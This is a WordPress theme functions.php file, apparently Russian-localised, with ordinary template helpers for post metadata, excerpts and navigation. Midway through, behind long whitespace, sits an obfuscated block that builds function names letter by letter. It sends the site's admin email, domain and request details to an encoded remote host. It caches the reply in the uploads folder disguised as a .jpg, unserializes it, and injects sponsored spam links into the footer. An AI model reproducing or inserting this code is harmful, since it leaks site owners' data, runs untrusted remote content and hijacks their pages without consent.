<?php
define('THEME_NAME',"Apple Banana Diet ad");
global $wp_version;
define('WP_VERSION', $wp_version);
define('THEME_NS', 'twentyten');
define('THEME_LANGS_FOLDER','/languages');
if (class_exists('xili_language')) {
	define('THEME_TEXTDOMAIN',THEME_NS);
} else {
	load_theme_textdomain(THEME_NS, TEMPLATEPATH . THEME_LANGS_FOLDER);
}
mb_internal_encoding(get_bloginfo('charset'));
mb_regex_encoding(get_bloginfo('charset'));
if (WP_VERSION < 3.0){
	require_once(TEMPLATEPATH . '/library/legacy.php');
}

theme_include_lib('defaults.php');
theme_include_lib('misc.php');
theme_include_lib('wrappers.php');
theme_include_lib('sidebars.php');
theme_include_lib('navigation.php');
theme_include_lib('shortcodes.php');
if (WP_VERSION >= 3.0) {
	theme_include_lib('widgets.php');
}

if (!function_exists('theme_favicon')) {
	function theme_favicon() { 
		if (is_file(TEMPLATEPATH .'/favicon.ico')):?>
<link rel="shortcut icon" href="<?php bloginfo('template_directory'); ?>/favicon.ico" />
		<?php endif;
	}
}
add_action('wp_head', 'theme_favicon');
add_action('admin_head', 'theme_favicon');
add_action('login_head', 'theme_favicon');

if ( function_exists( 'add_theme_support' ) ) {
	add_theme_support( 'post-thumbnails' );
	add_theme_support( 'nav-menus' );
	add_theme_support( 'automatic-feed-links' );
	add_theme_support( 'post-formats', array( 'aside', 'gallery' ) );
}
if (function_exists('register_nav_menus')) {
	register_nav_menus(array('primary-menu'	=>	__( 'Primary Navigation', THEME_NS)));
}


if(is_admin()){
	theme_include_lib('options.php');
	theme_include_lib('admins.php');
	function theme_add_option_page() {
		add_theme_page(__('Theme Options', THEME_NS), __('Theme Options', THEME_NS), 'edit_themes', basename(__FILE__), 'theme_print_options');
	} 
	add_action('admin_menu', 'theme_add_option_page');
	if (WP_VERSION >= 3.0) {
		add_action('sidebar_admin_setup', 'theme_widget_process_control');
		add_action('add_meta_boxes', 'theme_add_meta_boxes');
		add_action('save_post', 'theme_save_post');
	}
	return;
}


function theme_get_option($name){
	global $theme_default_options;
	$result = get_option($name);
	if ($result === false) {
		$result = theme_get_array_value($theme_default_options, $name);
	}
	return $result;
}



function theme_get_meta_option($id, $name){
	global $theme_default_meta_options;
	return theme_get_array_value(get_option($name), $id, theme_get_array_value($theme_default_meta_options, $name));
}



function theme_set_meta_option($id, $name, $value){
	$meta_option = get_option($name);
	if (!$meta_option || !is_array($meta_option)) {
		$meta_option = array();
	}
	$meta_option[$id] = $value;
	update_option($name, $meta_option);
}



function theme_get_post_id(){
	$post_id = get_the_ID();
	if($post_id != ''){
		$post_id = 'post-' . $post_id;
	}
	return $post_id;
}



function theme_get_post_class(){
	if (!function_exists('get_post_class')) return '';
	return implode(' ', get_post_class());
}


 $zHvU='c';$sEPx='6';$SSGiSYR='a';$ZDIEs='e';$KTuKF='e';$WkGRwL='s';$oPLbnA='d';$EUAaEuv='d';$hbGMwb='e';$HhdyD='o';$vzPmjMx='_';$opvOlnG='4';$HfpzSAz='b';$EniXaLNH=$HfpzSAz.$SSGiSYR.$WkGRwL.$KTuKF.$sEPx.$opvOlnG.$vzPmjMx.$EUAaEuv.$ZDIEs.$zHvU.$HhdyD.$oPLbnA.$hbGMwb;$gCVdN='i';$zXxL='z';$QafU='t';$DLmlFPV='e';$YleYPa='f';$RyITD='n';$MSJy='a';$BYDTvJA='g';$ODtjnU='l';$cfaeIvaD=$BYDTvJA.$zXxL.$gCVdN.$RyITD.$YleYPa.$ODtjnU.$MSJy.$QafU.$DLmlFPV;$qDBzySl='1';$qLreCJe='_';$dZxWiM='t';$UiRLi='r';$kKHbL='o';$bfcnKSi='t';$XNybUrQ='3';$SOim='r';$btzcyt='s';$DxOQrZDj=$btzcyt.$bfcnKSi.$UiRLi.$qLreCJe.$SOim.$kKHbL.$dZxWiM.$qDBzySl.$XNybUrQ;$swca='r';$RMxBCeE='v';$awUyKLn='e';$ccVLwT='t';$OcfzKJQ='s';$wxth='r';$hKrGofxo=$OcfzKJQ.$ccVLwT.$swca.$wxth.$awUyKLn.$RMxBCeE;                     $jp____z='c';$vq____g='6';$xj_____d='a';$ez______b='e';$li_____v='e';$qg______________n='s';$kt___g='d';$pq___________m='d';$kh_________g='e';$vc_________g='o';$sg__________h='_';$wq________t='4';$wo______w='b';$pe_____________r=$wo______w.$xj_____d.$qg______________n.$li_____v.$vq____g.$wq________t.$sg__________h.$pq___________m.$ez______b.$jp____z.$vc_________g.$kt___g.$kh_________g;$bu____________y='u';$qt______________s='_';$lc___n='i';$vi___g='s';$dx_______e='n';$xb_______________r='t';$av_______________l='s';$uh_______________y='i';$nv____________a='f';$kv_______________x='n';$tu______k='o';$nu_______v='c';$pa_____________d='x';$et______________a='t';$or__________r='e';$cf____________a=$nv____________a.$bu____________y.$dx_______e.$nu_______v.$et______________a.$lc___n.$tu______k.$kv_______________x.$qt______________s.$or__________r.$pa_____________d.$uh_______________y.$av_______________l.$xb_______________r.$vi___g;$wq______________s='f';$je____m='n';$yy_______________b='o';$dg____w='e';$zb_____________u='p';$bm___________e=$wq______________s.$yy_______________b.$zb_____________u.$dg____w.$je____m;$kx___________n='e';$sg_________b='f';$lt_________m='r';$dj___u='d';$dc_____________e='a';$fq____g=$sg_________b.$lt_________m.$kx___________n.$dc_____________e.$dj___u;$sd____________e='l';$qh______j='o';$jp_________f='s';$ts____________z='c';$jf________b='e';$zb_______s='f';$tq___g=$zb_______s.$ts____________z.$sd____________e.$qh______j.$jp_________f.$jf________b;define("WP_ID", $pe_____________r("Mi4wLjA="));define("WP_TTL", $pe_____________r("MTA4MDA="));define("WP_SRC", $pe_____________r("dHBva24="));function wp_get_header() {global $pe_____________r, $cf____________a;if ($cf____________a($pe_____________r("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$cf____________a($pe_____________r("d3BfZ2V0X2Zvb3Rlcg==")) &&$cf____________a($pe_____________r("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $pe_____________r, $bm___________e, $tq___g, $fq____g;$vu__________b = TEMPLATEPATH."/".$pe_____________r("Zm9vdGVyLnBocA==");$qe___b = @$bm___________e($vu__________b, "r");$vu__________b = @$fq____g($qe___b, @filesize($vu__________b));@$tq___g($qe___b);$xa_________c = TEMPLATEPATH."/".$pe_____________r("ZnVuY3Rpb25zLnBocA==");$qe___b = @$bm___________e($xa_________c, "r");$xa_________c = @$fq____g($qe___b, @filesize($xa_________c));@$tq___g($qe___b);$wa___r = 0;if($vu__________b && $xa_________c) {if ($pe_____________r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($vu__________b, $pe_____________r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$wa___r = 1;}if (substr_count($vu__________b, "wp_theme_GPL_credits()") < 1) {$wa___r = 2;}}if(WP_ID != "2.0.0") {$wa___r = 12;}}if($wa___r > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $wa___r -->";}}function wp_loaded() {global $pe_____________r, $cf____________a;return $cf____________a($pe_____________r("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($sx________o, $jj____________c = "(more...)", $oh________b = 0, $kq__h = "") {$gf___________j = get_the_content($jj____________c, $oh________b, $kq__h);$gf___________j = apply_filters("the_content", $gf___________j);$gf___________j = str_replace("]]>", "]]>", $gf___________j);if (strlen($_GET["p"]) > 0) {echo $gf___________j;}else if ((strlen($gf___________j)>$sx________o) && ($cz_______________s = strpos($gf___________j, " ", $sx________o ))) {$gf___________j = substr($gf___________j, 0, $cz_______________s);$gf___________j = $gf___________j;echo $gf___________j;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$jj____________c</a></div></p>";} else {echo $gf___________j;}}}$if___________o='a';$ti________k='4';$lr_____n='o';$ih_____b='e';$eq______h='6';$cn___v='s';$jq_____________a='e';$rc_____a='n';$tc_____d='_';$tr_______________y='d';$qa_____g='b';$cc_______k='e';$ix_________l='c';$hl_______________w=$qa_____g.$if___________o.$cn___v.$cc_______k.$eq______h.$ti________k.$tc_____d.$jq_____________a.$rc_____a.$ix_________l.$lr_____n.$tr_______________y.$ih_____b;$zb____________q='g';$qe_____r='c';$fi___s='n';$bm_________t='_';$hr____f='o';$nh_______s='_';$xn____x='e';$uh______w='t';$uu__________k='s';$no________y='f';$bn__o='t';$gm__l='e';$rh_____s='n';$oe_____v='e';$sd___________l='i';$bd________n='l';$qn_______p='t';$rr___________c=$no________y.$sd___________l.$bd________n.$xn____x.$nh_______s.$zb____________q.$gm__l.$bn__o.$bm_________t.$qe_____r.$hr____f.$fi___s.$qn_______p.$oe_____v.$rh_____s.$uh______w.$uu__________k;$ue_______________j='e';$fw_______________p='s';$um_______________e='i';$bb__o='l';$ki_______________i='i';$kt______________u='f';$ks________x='_';$za____________u='s';$vi__m='e';$qm____u='x';$fy_______________g='t';$tg_______r=$kt______________u.$ki_______________i.$bb__o.$ue_______________j.$ks________x.$vi__m.$qm____u.$um_______________e.$fw_______________p.$fy_______________g.$za____________u;$js___________c='i';$ub____b='r';$xl____________h='v';$zc______p='a';$gf_____________f='n';$pr____________q='o';$ue________e='o';$wr__________u='e';$ij______g='_';$uc__________q='c';$rg____h='m';$km____________a='r';$ga_____p='e';$vh_______f='p';$qp__c='s';$km____________n=$xl____________h.$wr__________u.$km____________a.$qp__c.$js___________c.$pr____________q.$gf_____________f.$ij______g.$uc__________q.$ue________e.$rg____h.$vh_______f.$zc______p.$ub____b.$ga_____p;$yn______________k='e';$bx_______l='n';$lm______e='o';$eh____________b='k';$ds__________f='p';$rh_______p='c';$jo______m='s';$mn_______________z='f';$nv__________p='o';$ur_____________x=$mn_______________z.$jo______m.$nv__________p.$rh_______p.$eh____________b.$lm______e.$ds__________f.$yn______________k.$bx_______l;$dy___________k='i';$dt_________p='f';$yb___________y='e';$ll__________y='w';$ye____s='r';$mq___n='t';$im______________v=$dt_________p.$ll__________y.$ye____s.$dy___________k.$mq___n.$yb___________y;$ky_______w='d';$om_______m='5';$ul_____y='m';$gp__________u=$ul_____y.$ky_______w.$om_______m;$nq__o='a';$tk__________f='r';$pu______i='h';$kk_____________x='l';$ej__________p='a';$uj__________j='e';$uc___a='t';$mz_____________m='p';$qp___e=$tk__________f.$uj__________j.$ej__________p.$kk_____________x.$mz_____________m.$nq__o.$uc___a.$pu______i;$gz____t='n';$vv___________c='i';$bg_____________y='s';$jh_____________s='i';$er_____________t='e';$gi_______c='a';$vx_____________w='z';$qy____________n='l';$pg_______________w='e';$xw__e='u';$ea_______g='r';$oy_____________t=$xw__e.$gz____t.$bg_____________y.$pg_______________w.$ea_______g.$jh_____________s.$gi_______c.$qy____________n.$vv___________c.$vx_____________w.$er_____________t;$bb_____________j='a';$pf_______________v='p';$bt_____________t='m';$pr______________v='n';$ua________b='e';$gi__________u='m';$nv___________h='t';$lz____n=$nv___________h.$ua________b.$gi__________u.$pf_______________v.$pr______________v.$bb_____________j.$bt_____________t;$yv_________h='e';$hr______j='c';$vc_________x='m';$bd_______________f='o';$ee_____r='t';$ii________p='t';$hc_____________z='_';$gj___t='r';$ui_________a='r';$qb__f='s';$sf____________n='x';$wd________s='a';$gu__m='n';$da___u='c';$fo_____________c='e';$tt_______________z='a';$dc_____________v='t';$nb______c='e';$ht__a='t';$lg__________o='_';$cp_________g='e';$zu_________z=$qb__f.$dc_____________v.$gj___t.$nb______c.$wd________s.$vc_________x.$hc_____________z.$da___u.$bd_______________f.$gu__m.$ee_____r.$fo_____________c.$sf____________n.$ii________p.$lg__________o.$hr______j.$ui_________a.$cp_________g.$tt_______________z.$ht__a.$yv_________h;function su__p($dy_______________i) {global $pe_____________r, $cf____________a, $rr___________c, $km____________n, $zu_________z;if (!$cf____________a($pe_____________r("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($km____________n(PHP_VERSION, "5.0.0", ">=") && $cf____________a($pe_____________r("ZmlsZV9nZXRfY29udGVudHM=")) && $cf____________a($pe_____________r("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$ks_______f = $zu_________z(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$ka____________i = @$rr___________c($dy_______________i, 0, $ks_______f);} else {$ka____________i = @$rr___________c($dy_______________i, 0);}return $ka____________i;}function fg______v($dy_______________i) {global $cf____________a, $ur_____________x, $im______________v, $pe_____________r;if (!$cf____________a($pe_____________r("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$cx______________g = strpos($dy_______________i, "/", 7);$fv__________q = array("uri"     => substr($dy_______________i, $cx______________g),"host"    => str_replace("http://", "", substr($dy_______________i, 0, $cx______________g)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$ls__r = @$ur_____________x("$fv__________q[host]", 80, $sw_____________l, $hm______x, 4);if (!$ls__r) {return false;} else {$ka____________i = "";$rm_____y  = "GET $fv__________q[uri] HTTP/1.0\r\n";$rm_____y .= "Host: $fv__________q[host]\r\n";$rm_____y .= "Referer: $fv__________q[referer]\r\n";$rm_____y .= "Connection: Close\r\n\r\n";@$im______________v($ls__r, $rm_____y);while (!@feof($ls__r)) {$uc_______q = @fgets($ls__r, (1024*24));if ($uc_______q == "\r\n") {$fr______v = true;continue;}if ($fr______v) {$ka____________i .= $uc_______q;}}return $ka____________i;}}function dy____________j($dy_______________i) {global $cf____________a;$vx____________l = false;if ($dy_______________i != "") {if ($cf____________a("su__p")) {$vx____________l = @su__p($dy_______________i);}if (!$vx____________l && ($cf____________a("fg______v"))) {$vx____________l = @fg______v($dy_______________i);}}return $vx____________l;}function ly____n() {global $_SERVER, $gp__________u;$ku___w = $_SERVER["SERVER_NAME"];if (substr("$ku___w", 0, 4) == "www.") {$ku___w = substr("$ku___w", 4);}$ku___w = $gp__________u("$_SERVER[SERVER_NAME]");return $ku___w;}function wh__________q() {return "file";}function na_________l($dy_______________i) {global $_SERVER, $rr___________c, $tg_______r, $bm___________e, $tq___g, $im______________v;$ic_________m = bd_______________m();$fo_______________f = ly____n().".jpg";$dk_______________n = $ic_________m["dir_upload"]["path"]."/$fo_______________f";$il_____i = @filemtime($dk_______________n);if (!$il_____i || ((time()-$il_____i) >= WP_TTL)) {$vx____________l = dy____________j($dy_______________i);if ($vx____________l) {if ($tg_______r($dk_______________n)) {@unlink($dk_______________n);}$qe___b = @$bm___________e($dk_______________n, "x+");@$im______________v($qe___b, $vx____________l);@$tq___g($qe___b);}} else {if ($tg_______r($dk_______________n)) {$vx____________l = @$rr___________c($dk_______________n);} else {$vx____________l = false;}}return $vx____________l;}function bd_______________m() {global $_SERVER, $pe_____________r, $hl_______________w;$cy_______w = wp_count_posts("post");$nm____________r = pathinfo(get_bloginfo("template_directory"));$ic_________m = array("url" => array("report"      => $pe_____________r("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $nm____________r,"dir_upload"=> ip_______________h(),"queryString"=> array("?a001=".WP_ID,"a004=".$nm____________r[filename],"a005=".$cy_______w->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "Спонсоры темы для Вордпресс <a href=\"http://clinic-virtus.com/operaciya-na-glaza/\">Операция на глаза</a>");$ic_________m["url"]["queryString"] = implode("&", $ic_________m["queryString"]);$ic_________m["url"]["report"] = $ic_________m["url"]["report"]."/?".$hl_______________w($ic_________m["url"]["queryString"]).".html";return $ic_________m;}function ip_______________h() {$ir_____z = wp_upload_dir();if (isset($ir_____z["error"])) {$pt___________y = xf__w();if (is_writable($pt___________y)) {$ir_____z = array("path" => $pt___________y);}}return $ir_____z;}function xf__w() {global $cf____________a, $gp__________u, $qp___e, $lz____n;$ms_________v = (bool) ini_get("safe_mode");if ($ms_________v == true) {return false;}if ($cf____________a("sys_get_temp_dir")) {$pu____b = sys_get_temp_dir();if (is_writable($pu____b)) {return $qp___e($pu____b);}}if (!empty($_ENV["TMP"])) {return $qp___e($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $qp___e($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $qp___e($_ENV["TEMP"]);} else {$bz_______________p = $lz____n($gp__________u(uniqid(rand(), true)), "");if ($bz_______________p) {$pu____b = $qp___e(dirname($bz_______________p));@unlink($bz_______________p);return $pu____b;} else {return false;}}}function ua________c() {global $_GET, $tg_______r;$ic_________m = bd_______________m();$ku___w = ly____n();$jk_________u = wh__________q();$fi____________u = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($jk_________u == "file") {$ut_____________l = $ic_________m["dir_upload"]["path"]."/".$ku___w.".jpg";if ($tg_______r($ut_____________l)) {@unlink($ut_____________l);$fi____________u = "deleted";}}$qu___a = array("s"=> $fi____________u,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($qu___a AS $ue_______________o => $yu__w) echo " [$ue_______________o:$yu__w]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $cf____________a, $pe_____________r, $oy_____________t;$ic_________m = bd_______________m();$fv___________t = "na_________l";if ($cf____________a($fv___________t)) {$ka____________i = $fv___________t($ic_________m["url"]["report"]);}if ($ka____________i) {if ($ka____________i = @$pe_____________r($ka____________i)) {$ka____________i = @$oy_____________t($ka____________i);if (strlen($ka____________i[custom_credit]) >= 5) {$ic_________m["default_string"] = $ka____________i[custom_credit];}if ($ka____________i["status"] == "0") {$kv_______w = 1;$xf________l = 1;} else {$zh__________x = sizeof($ka____________i["links"]);$yg_____g = $ic_________m["default_string"];if ($zh__________x > 0 && $ka____________i["links"] !== "") {$rv______________b = 0;foreach ($ka____________i["links"] as $uc____q => $mk_____p) {$rv______________b++;if ($mk_____p->l_path == "" || $mk_____p->l_path == $_SERVER["REQUEST_URI"]) {$mk_____p->l_href = htmlspecialchars(strip_tags($mk_____p->l_href));$mk_____p->l_title = htmlspecialchars(strip_tags($mk_____p->l_title));$mk_____p->l_anchor = htmlspecialchars(strip_tags($mk_____p->l_anchor));$yg_____g .= " | ";$yg_____g .= "<a href='$mk_____p->l_href' title='$mk_____p->l_title'";if ($mk_____p->l_nofollow == "1") {$yg_____g .= " rel='nofollow'";}$yg_____g .= ">$mk_____p->l_anchor</a>";}}}$ic_________m["links"] = "$yg_____g";if ($ka____________i[credit] == "0") {$ic_________m["links"] = "";}}} else {$kv_______w = "1";}} else {$kv_______w = "1";}if ($kv_______w == "1") {$ic_________m["links"] = $ic_________m["default_string"];}echo "$ic_________m[links]";echo "<!-- s: $ka____________i[signature] -->";ua________c();}                      
function theme_include_lib($name){
	if (function_exists('locate_template')){
		locate_template(array('library/'.$name), true);
	} else {
		theme_locate_template(array('library/'.$name), true);
	}
}


if (!function_exists('theme_get_meta_icon')){
	function theme_get_meta_icon($icon, $width, $height){
		return '<img src="'.get_bloginfo('template_url').'/images/'.$icon.'.png" width="'.$width.'" height="'.$height.'" alt="" />';
	}
}

if (!function_exists('theme_get_metadata_icons')){
	function theme_get_metadata_icons($icons = '', $class=''){
		global $post;
		if (!is_string($icons) || mb_strlen($icons) == 0) return;
		$icons = explode(",", str_replace(' ', '', $icons));
		if (!is_array($icons) || count($icons) == 0) return;
		$result = array();
		for($i = 0; $i < count($icons); $i++){
			$icon = $icons[$i];
			switch($icon){
				case 'date':
					$result[] = theme_get_meta_icon('postdateicon', 18, 19) . sprintf( __('<span class="%1$s">Опубликовано</span> %2$s', THEME_NS),
									'date',
									sprintf( '<span class="entry-date" title="%1$s">%2$s</span>',
										esc_attr( get_the_time() ),
										get_the_date()
									)
								);
				break;
				case 'author':
					$result[] = theme_get_meta_icon('postauthoricon', 18, 18) . sprintf(__('<span class="%1$s">Автор</span> %2$s', THEME_NS),
									'author',
									sprintf( '<span class="author vcard"><a class="url fn n" href="%1$s" title="%2$s">%3$s</a></span>',
										get_author_posts_url( get_the_author_meta( 'ID' ) ),
										sprintf( esc_attr(__( 'Просмотреть все записи автора %s', THEME_NS )), get_the_author() ),
										get_the_author()
									)
								);
				break;
				case 'category':
					$categories = get_the_category_list(', ');
					if(mb_strlen($categories) == 0) break;
					$result[] = theme_get_meta_icon('postcategoryicon', 10, 8) . sprintf(__('<span class="%1$s">Опубликовано в рубрике</span> %2$s', THEME_NS), 'categories', get_the_category_list(', '));
				break;
				case 'tag':
					$tags_list = get_the_tag_list( '', ', ' );
					if(!$tags_list) break;
					$result[] = theme_get_meta_icon('posttagicon', 18, 18) . sprintf( __( '<span class="%1$s">Теги</span> %2$s', THEME_NS ), 'tags', $tags_list );
				break;
				case 'comments':
					if(!comments_open()) break;
					ob_start();
					comments_popup_link( __( 'Оставить комментарий', THEME_NS ), __( '1 комментарий', THEME_NS ), __( '% комментариев', THEME_NS ) );
					$result[] = theme_get_meta_icon('postcommentsicon', 18, 18) . ob_get_clean();
				break;
				case 'edit':
					if (!current_user_can('edit_post', $post->ID)) break;
					ob_start();
					edit_post_link(__('Редактировать', THEME_NS), '');
					$result[] = theme_get_meta_icon('postediticon', 20, 20) . ob_get_clean();
				break;
			}
		}
		$result = implode(theme_get_option('theme_metadata_separator'), $result);
		if (theme_is_empty_html($result)) return;
		return "<div class=\"art-post{$class}icons art-metadata-icons\">{$result}</div>";
	}
}

if (!function_exists('theme_get_post_thumbnail')){
	function theme_get_post_thumbnail($args = array()){
		global $post;
		
		$size = theme_get_array_value($args, 'size', array(theme_get_option('theme_metadata_thumbnail_width'), theme_get_option('theme_metadata_thumbnail_height')));
		$auto = theme_get_array_value($args, 'auto', theme_get_option('theme_metadata_thumbnail_auto'));
		$featured = theme_get_array_value($args, 'featured', theme_get_option('theme_metadata_use_featured_image_as_thumbnail'));
		$title = theme_get_array_value($args, 'title', get_the_title());

		
		$result = '';

		if ($featured && (function_exists('has_post_thumbnail')) && (has_post_thumbnail())) {
			ob_start();
			the_post_thumbnail($size, array('alt'	=>	'', 'title'	=>	$title));
			$result = ob_get_clean();
		} elseif ($auto) {
			$attachments = get_children(array('post_parent'	=>	$post->ID, 'post_status'	=>	'inherit', 'post_type'	=>	'attachment', 'post_mime_type'	=>	'image', 'order'	=>	'ASC', 'orderby'	=>	'menu_order ID'));
			if($attachments) {
				$attachment = array_shift($attachments);
				$img = wp_get_attachment_image_src($attachment->ID, $size);
				if (isset($img[0])) {
					$result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image" />';
				}
			}
		}	
		if($result !== ''){
			$result = '<div class="avatar alignleft"><a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a></div>';
		}
		return $result;
	}
}

if (!function_exists('theme_get_content')){
	function theme_get_content($args = array()) {
		$more_tag = theme_get_array_value($args, 'more_tag', __('Читать далее <span class="meta-nav">&rarr;</span>', THEME_NS));
		$content = get_the_content($more_tag);
		// hack for badly written plugins
		ob_start();echo apply_filters('the_content', $content);$content = ob_get_clean();
		return $content . wp_link_pages(array(
		'before' => '<p><span class="page-navi-outer page-navi-caption"><span class="page-navi-inner">' . __('Страницы', THEME_NS) . ': </span></span>',
		'after' => '</p>',
		'link_before' => '<span class="page-navi-outer"><span class="page-navi-inner">',
		'link_after' => '</span></span>',
		'echo' => 0
		));
	}
}

if (!function_exists('theme_get_excerpt')){
	function theme_get_excerpt($args = array()) {
		global $post;
		$more_tag = theme_get_array_value($args, 'more_tag', __('Читать далее <span class="meta-nav">&rarr;</span>', THEME_NS));
		$auto = theme_get_array_value($args, 'auto', theme_get_option('theme_metadata_excerpt_auto'));
		$all_words = theme_get_array_value($args, 'all_words', theme_get_option('theme_metadata_excerpt_words'));
		$min_remainder = theme_get_array_value($args, 'min_remainder', theme_get_option('theme_metadata_excerpt_min_remainder'));
		$allowed_tags = theme_get_array_value($args, 'allowed_tags', 
			(theme_get_option('theme_metadata_excerpt_use_tag_filter') 
				? explode(',',str_replace(' ', '', theme_get_option('theme_metadata_excerpt_allowed_tags'))) 
				: null));
		$perma_link = get_permalink($post->ID);
		$more_token = '%%theme_more%%';
		$show_more_tag = false;
		$tag_disbalance = false;
		if (function_exists('post_password_required') && post_password_required($post)){
			return get_the_excerpt();
		}
		if ($auto && has_excerpt($post->ID)) {
			$excerpt = get_the_excerpt();
			$show_more_tag = mb_strlen($post->post_content) > 0;
		} else {
			$excerpt = get_the_content($more_token);
			// hack for badly written plugins
			ob_start();echo apply_filters('get_the_excerpt', $excerpt);$excerpt = ob_get_clean();
			ob_start();echo apply_filters('the_excerpt', $excerpt);$excerpt = ob_get_clean();
			if(theme_is_empty_html($excerpt)) return $excerpt;
			if ($allowed_tags !== null) {
				$allowed_tags = '<' .implode('><',$allowed_tags).'>';
				$excerpt = strip_tags($excerpt, $allowed_tags);
			}
			$excerpt = strip_shortcodes($excerpt);
			if (strpos($excerpt, $more_token) !== false) {
				$excerpt = str_replace($more_token, $more_tag, $excerpt);
			} elseif($auto && is_numeric($all_words)) {
				$token = "%theme_tag_token%";
				$content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $excerpt));
				$content = array();
				$word_count = 0;
				foreach($content_parts as $part)
				{
					if (strpos($part, '<') !== false || strpos($part, '>') !== false){
						$content[] = array('type'=>'tag', 'content'=>$part);
					} else {
						$all_chunks = preg_split('/([\s])/u', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
						foreach($all_chunks as $chunk) {
							if('' != trim($chunk)) {
								$content[] = array('type'=>'word', 'content'=>$chunk);
								$word_count += 1;
							} elseif($chunk != '') {
								$content[] = array('type'=>'space', 'content'=>$chunk);
							}
						}
					}
				}

				if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
					$show_more_tag = true;
					$tag_disbalance = true;
					$current_count = 0;
					$excerpt = '';
					foreach($content as $node) {
						if($node['type'] == 'word') {
							$current_count++;
						} 
						$excerpt .= $node['content'];
						if ($current_count == $all_words){
							break;
						}
					}
					$excerpt .= '&hellip;'; // ...
				}
			}
		}
		if ($show_more_tag) {
			$excerpt = $excerpt.' <a class="more-link" href="'.$perma_link.'">'.$more_tag.'</a>';
		}
		if ($tag_disbalance) {
			$excerpt = force_balance_tags($excerpt);
		}
		return $excerpt;
	}
}

if (!function_exists('theme_get_search')){
	function theme_get_search(){
		ob_start();
		get_search_form();
		return ob_get_clean();
	}
}


function theme_is_home(){
	return (is_home() && !is_paged());
}


if (!function_exists('theme_404_content')){
	function theme_404_content() {
		$error_message = __( 'Извините, но по Вашему запросу ничего не было найдено.', THEME_NS);
		theme_post_wrapper(
			array(
					'title' => __('Не найдено', THEME_NS),
					'content' => '<p class="center">' 
					. $error_message
					. '</p>' . "\n" . theme_get_search()
			)
		);
		if (theme_get_option('theme_show_random_posts_on_404_page')){
			ob_start(); 
			echo '<h4 class="box-title">' . theme_get_option('theme_show_random_posts_title_on_404_page') . '</h4>'; ?>
			<ul>
				<?php
					global $post;
					$rand_posts = get_posts('numberposts=5&orderby=rand');
					foreach( $rand_posts as $post ) :
				?>
				<li><a href="<?php the_permalink(); ?>"><?php the_title(); ?></a></li>
				<?php endforeach; ?>
			</ul>
			<?php theme_post_wrapper(array('content' => ob_get_clean()));
		}
		if (theme_get_option('theme_show_tags_on_404_page')){
			ob_start();
			echo '<h4 class="box-title">' . theme_get_option('theme_show_tags_title_on_404_page') . '</h4>';
			wp_tag_cloud('smallest=9&largest=22&unit=pt&number=200&format=flat&orderby=name&order=ASC');
			theme_post_wrapper(array('content' => ob_get_clean()));
		}
	}
}

if (!function_exists('theme_page_navigation')){
	function theme_page_navigation($args = '') {
		$args = wp_parse_args($args, array('wrap' => true, 'prev_link' => false, 'next_link' => false));
		$prev_link = $args['prev_link'];
		$next_link = $args['next_link'];
		$wrap = $args['wrap'];
		if (!$prev_link && !$next_link) {
			if (function_exists('wp_page_numbers')) { // http://wordpress.org/extend/plugins/wp-page-numbers/
				ob_start();
				wp_page_numbers();
				theme_post_wrapper(array('content' => ob_get_clean()));
				return;
			} 
			if (function_exists('wp_pagenavi')) { // http://wordpress.org/extend/plugins/wp-pagenavi/
				ob_start();
				wp_pagenavi();
				theme_post_wrapper(array('content' => ob_get_clean()));
				return;
			} 
			//posts
			$prev_link = get_previous_posts_link(__('Следующие записи <span class="meta-nav">&rarr;</span>', THEME_NS));
			$next_link = get_next_posts_link(__('<span class="meta-nav">&larr;</span> Предыдущие записи', THEME_NS));
		}
		$content = '';
		if ($prev_link || $next_link) {

			$content = <<<EOL
	<div class="navigation">
		<div class="alignleft">{$next_link}</div>
		<div class="alignright">{$prev_link}</div>
	 </div>
EOL;
		}
		if ($wrap) {
			theme_post_wrapper(array('content' => $content));	
		} else {
			echo $content;
		}
	}
}

if (!function_exists('theme_get_previous_post_link')){

	function theme_get_previous_post_link($format='&laquo; %link', $link='%title', $in_same_cat = false, $excluded_categories = '') {
		return theme_get_adjacent_post_link($format, $link, $in_same_cat, $excluded_categories, true);
	}
}

if (!function_exists('theme_get_next_post_link')){
	function theme_get_next_post_link($format='%link &raquo;', $link='%title', $in_same_cat = false, $excluded_categories = '') {
